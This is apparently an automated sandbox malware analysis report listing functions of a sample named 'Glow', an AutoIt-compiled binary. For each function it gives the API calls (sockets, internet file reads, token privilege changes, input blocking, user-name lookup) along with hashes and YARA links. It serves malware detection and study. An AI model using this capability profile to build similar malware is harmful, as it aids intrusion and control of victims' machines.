Instruction Fuzzy Hash: E54177B190060EAFCF16EF64C945AEEBBB8EF05350F144055E919E6291E7309E44CF61

Function 00402263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
Part of subcall function 00403AAB: _wcslen.LIBCMT ref: 00403AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004022BA
WSAGetLastError.WSOCK32 ref: 004022E1
bind.WSOCK32(00000000,?,00000010), ref: 00402338
WSAGetLastError.WSOCK32 ref: 00402343
closesocket.WSOCK32(00000000), ref: 00402372

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 52c85f8f9b09e67f80cd2c4c29996f3ea5bf65adf6e777baeb9bf6690a3dcfca
Instruction ID: 5e33a648404148c395bb8714d57478043b632fad1d5ec8ab437aa03b23e0cf44
Opcode Fuzzy Hash: 52c85f8f9b09e67f80cd2c4c29996f3ea5bf65adf6e777baeb9bf6690a3dcfca
Instruction Fuzzy Hash: 3C51C371A00200AFE711AF24C98AF6A77E5AB44714F54809DF9596F3C3D774AD42CBA1

Function 004126DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0041275C
IsWindowEnabled.USER32 ref: 0041276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00412777
IsIconic.USER32 ref: 00412785
IsZoomed.USER32 ref: 00412793

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a9e4f0913fe4e91545be5f6672d4b670b59a69d9d660b8db4d17280ae2a908b3
Instruction ID: 2063fb8ca8fc4e70b0c09c1fb59966125cc5de5a02334861b35e8cd25d1b8e43
Opcode Fuzzy Hash: a9e4f0913fe4e91545be5f6672d4b670b59a69d9d660b8db4d17280ae2a908b3
Instruction Fuzzy Hash: 4F2127357002109FD7119F26C944B9B7BE5EF95314F18806EE859CB391D7B9EC82CB98

Function 003FD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 003FD8CE
GetLastError.KERNEL32(?,00000000), ref: 003FD92F
SetEvent.KERNEL32(?,?,00000000), ref: 003FD943

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: adea2c84eab3147462c9480b25c1e1650f3d61fd620b552e8efee2aec1e78bba
Instruction ID: 570bbb2f14436653bcc19cc68d87196e22eedd091fa5b4f63c5bba2b382f11f9
Opcode Fuzzy Hash: adea2c84eab3147462c9480b25c1e1650f3d61fd620b552e8efee2aec1e78bba
Instruction Fuzzy Hash: B221D3B1900709EFE7229FA5C848BABB7FDEF41314F10842DE65692141D7B4EE04CB54

Function 003EE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,003C46AC), ref: 003EE482
GetFileAttributesW.KERNEL32(?), ref: 003EE491
FindFirstFileW.KERNEL32(?,?), ref: 003EE4A2
FindClose.KERNEL32(00000000), ref: 003EE4AE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 74a61c8b0aa40a0dae17decb73785810d5cc79b9c9d5bd0c3266074fdd10d447
Instruction ID: 9bda655b406ddc5729c2935444bc1820df045c6d9bbb3386f64613f594b224d3
Opcode Fuzzy Hash: 74a61c8b0aa40a0dae17decb73785810d5cc79b9c9d5bd0c3266074fdd10d447
Instruction Fuzzy Hash: F0F0E57081093067D211773DAC0D8EB77ADAE02335B508751F836C20F0D7789D958A99

Function 003DE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003DE5F8

Strings

X64, xrefs: 003DE680
%.3d, xrefs: 003DE603

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 39c296f4400e2a3f0b0b619259071e180273cf6404e8c9fcddee88edb5e9bd11
Instruction ID: ed392bba82dbac319d7a2f24287c0526f3721e636cfadb635049dbcfec6c32f9
Opcode Fuzzy Hash: 39c296f4400e2a3f0b0b619259071e180273cf6404e8c9fcddee88edb5e9bd11
Instruction Fuzzy Hash: F7D012B3C08118DACB82EAA0AC88DB9777CAB18700F2084A7F906D5540E634D9489725

Function 003B2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 003B2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 003B2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 003B2AA1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fe4b54c5f58b9cc50c37c9b20f646d3010ae95f0f3006ad61c36b700999e8ed8
Instruction ID: ca44e95e5b446a18b9200491e57f0083c88a869c943c2da67832d530b8c72e09
Opcode Fuzzy Hash: fe4b54c5f58b9cc50c37c9b20f646d3010ae95f0f3006ad61c36b700999e8ed8
Instruction Fuzzy Hash: E131D87590121C9BCB21DF68D9887DDBBB4EF08310F5082EAE81CA7260E7749F858F45

Function 003E2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 003A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 003A09D8
Part of subcall function 003A014B: __CxxThrowException@8.LIBVCRUNTIME ref: 003A09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
GetLastError.KERNEL32 ref: 003E2097

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 19ede9564027914ac3631f5642faf5dd58cdf89fe639a5a424f8b6f8e73dac0b
Instruction ID: e7f3808caa56bcfd210c585b105299103e34892424a7badf487b5ca9fa4df21b
Opcode Fuzzy Hash: 19ede9564027914ac3631f5642faf5dd58cdf89fe639a5a424f8b6f8e73dac0b
Instruction Fuzzy Hash: D611BFB1810214BFD718AF64DCC6DABBBBCEB05710B20852EE45657291DB70BC41CA24

Function 003A5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5079
TerminateProcess.KERNEL32(00000000,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5080
ExitProcess.KERNEL32 ref: 003A5092

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: adb7fad176802a8ac0cb429ab5078c8a0ddf0cf06d95757a907ad5de879c4746
Instruction ID: 16fdde013cdd7deced9112233e9f85a6c70a5db4a653df2750bbdd76054a89b8
Opcode Fuzzy Hash: adb7fad176802a8ac0cb429ab5078c8a0ddf0cf06d95757a907ad5de879c4746
Instruction Fuzzy Hash: 7EE0EC72400548AFCF22AF54DD09E983B69EF51385F118124FD599A531DB35DD42CBC4

Function 003DE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 003DE664

Strings

X64, xrefs: 003DE680

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 189288ccdbd4e123618c5bf4e49e647c3fc844e9d09583cbc17a6b94ddabb458
Instruction ID: f8f4ef30b34383b4490f3a5fa4dccdf3804088bd780a47669ee75c7edefcef11
Opcode Fuzzy Hash: 189288ccdbd4e123618c5bf4e49e647c3fc844e9d09583cbc17a6b94ddabb458
Instruction Fuzzy Hash: CED0C9F580111DEACF81CB90ECC8ED9777CBB04304F114662F146A2140D730A5488B14

Function 003F41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4239

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e65804a1ae3d738c04fe496acf460a3e0e6bb26efbbab3798a1ce74d91b9d38c
Instruction ID: d95cdef5aa5470f3000ef4aebc9f34160acbc84e6a398b9760d093c25a77db78
Opcode Fuzzy Hash: e65804a1ae3d738c04fe496acf460a3e0e6bb26efbbab3798a1ce74d91b9d38c
Instruction Fuzzy Hash: 6BF0E5706003297AE72126659C4DFFB766DEFC5761F000175F609D2181DA709D00C7B0

Function 003E1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E1B48), ref: 003E1A20
CloseHandle.KERNEL32(?,?,003E1B48), ref: 003E1A35

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c395ca728d11fce4feec1c48ed6736110d351ba4836b3675d952eb730ffd68c0
Instruction ID: 156abfd73517d8ec11da9a49c77074d263db5575fe6f751e19f12cd8edb39c19
Opcode Fuzzy Hash: c395ca728d11fce4feec1c48ed6736110d351ba4836b3675d952eb730ffd68c0
Instruction Fuzzy Hash: AAE0BF76014620BFE7262B21FC05FB6BBA9EB04311F14892DF9A5844B0DB72AC91DB54

Function 003FF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 003FF51A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: eb773a78723eb78e4746662d8b5a10edb06220ac28ffc8d5ccb2bd3db53b5c99
Instruction ID: 8be9fdd0958d8a1a6d327420930d621102cde17e719abc84bbf63b8a8f294287
Opcode Fuzzy Hash: eb773a78723eb78e4746662d8b5a10edb06220ac28ffc8d5ccb2bd3db53b5c99
Instruction Fuzzy Hash: EAE01A322102049FC711AF69D804A9AB7ECAFA5761B008466FD4ACB251DA70A9408BA4

Function 003EEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003EEC95

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e5bd5c04b6d528ad9192e142f732378ec6bb60667f994ae298d270c73b15b4d4
Instruction ID: 7ae968352c165b74c16895ac7225d7d37322a71a59f79cdb9f14c7a46cb1e610
Opcode Fuzzy Hash: e5bd5c04b6d528ad9192e142f732378ec6bb60667f994ae298d270c73b15b4d4
Instruction Fuzzy Hash: D9D05EB61943B179E81F0A3E8F2FFF6090EE302741FA14349F202D99D5E5D1B9409129

Function 003A0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,003A075E), ref: 003A0D4A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3908236829dbe82aebdb3d70f2f1cf2195cf57b5d67843230c22773273f32276
Instruction ID: 64460189f41b92825b0959d85252db16329e84c12a721f0b40c431517a9e502a
Opcode Fuzzy Hash: 3908236829dbe82aebdb3d70f2f1cf2195cf57b5d67843230c22773273f32276
Instruction Fuzzy Hash:

Function 0040353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0040358D
DeleteObject.GDI32(00000000), ref: 004035A0
DestroyWindow.USER32 ref: 004035AF
GetDesktopWindow.USER32 ref: 004035CA
GetWindowRect.USER32(00000000), ref: 004035D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00403700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0040370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403755
GetClientRect.USER32(00000000,?), ref: 00403761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037DD
GlobalLock.KERNEL32(00000000), ref: 004037E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037F5
GlobalUnlock.KERNEL32(00000000), ref: 004037FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403805
GlobalFree.KERNEL32(00000000), ref: 00403810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00420C04,00000000), ref: 00403838
GlobalFree.KERNEL32(00000000), ref: 00403848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0040386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0040388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004038AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403A9C

Strings

, xrefs: 00403A22
AutoIt v3, xrefs: 0040374F
DISPLAY, xrefs: 004038FF
static, xrefs: 00403797, 004038EE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d9f0040c317efb0cfdd46e4754cdc5e55be8b6f79e6fba22c7fc051bbf72dfd2
Instruction ID: 760c4269d33600b9594576cd4e27296979cb126a0ad411f03694e2dec7e28a3f
Opcode Fuzzy Hash: d9f0040c317efb0cfdd46e4754cdc5e55be8b6f79e6fba22c7fc051bbf72dfd2
Instruction Fuzzy Hash: FA02AFB1900205AFDB14DF64CD89EAE7BB9FB49311F008569F915AB2A1CB78ED01CF64

Function 00381625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 003816B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 003C2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003C2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003C2F85

Part of subcall function 00381802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00381488,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 00381865

SendMessageW.USER32(?,00001053), ref: 003C2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003C2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 003C2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 003C2FF9

Strings

(E, xrefs: 003C2CA1
0, xrefs: 003C2E11
(E, xrefs: 003C3035
(E, xrefs: 003C2B86

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$(E$(E$(E
API String ID: 2760611726-87863512
Opcode ID: 80a984ea8865917818306e999e5ccc4d20f9150ff34a8a8cb2834f69a0a98089
Instruction ID: b1e598c639948188dde6e7926fc9bccdee26808ef64adcd843b3b2471e1e1347
Opcode Fuzzy Hash: 80a984ea8865917818306e999e5ccc4d20f9150ff34a8a8cb2834f69a0a98089
Instruction Fuzzy Hash: 08128D70600301AFC726EF14C944FAABBE9BB45301F19856DF89ADB661C771EC82CB95

Function 00417B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00417B67
GetSysColorBrush.USER32(0000000F), ref: 00417B98
GetSysColor.USER32(0000000F), ref: 00417BA4
SetBkColor.GDI32(?,000000FF), ref: 00417BBE
SelectObject.GDI32(?,?), ref: 00417BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00417BF8
GetSysColor.USER32(00000010), ref: 00417C00
CreateSolidBrush.GDI32(00000000), ref: 00417C07
FrameRect.USER32(?,?,00000000), ref: 00417C16
DeleteObject.GDI32(00000000), ref: 00417C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00417C68
FillRect.USER32(?,?,?), ref: 00417C9A
GetWindowLongW.USER32(?,000000F0), ref: 00417CBC

Part of subcall function 00417E22: GetSysColor.USER32(00000012), ref: 00417E5B
Part of subcall function 00417E22: SetTextColor.GDI32(?,00417B2D), ref: 00417E5F
Part of subcall function 00417E22: GetSysColorBrush.USER32(0000000F), ref: 00417E75
Part of subcall function 00417E22: GetSysColor.USER32(0000000F), ref: 00417E80
Part of subcall function 00417E22: GetSysColor.USER32(00000011), ref: 00417E9D
Part of subcall function 00417E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00417EAB
Part of subcall function 00417E22: SelectObject.GDI32(?,00000000), ref: 00417EBC
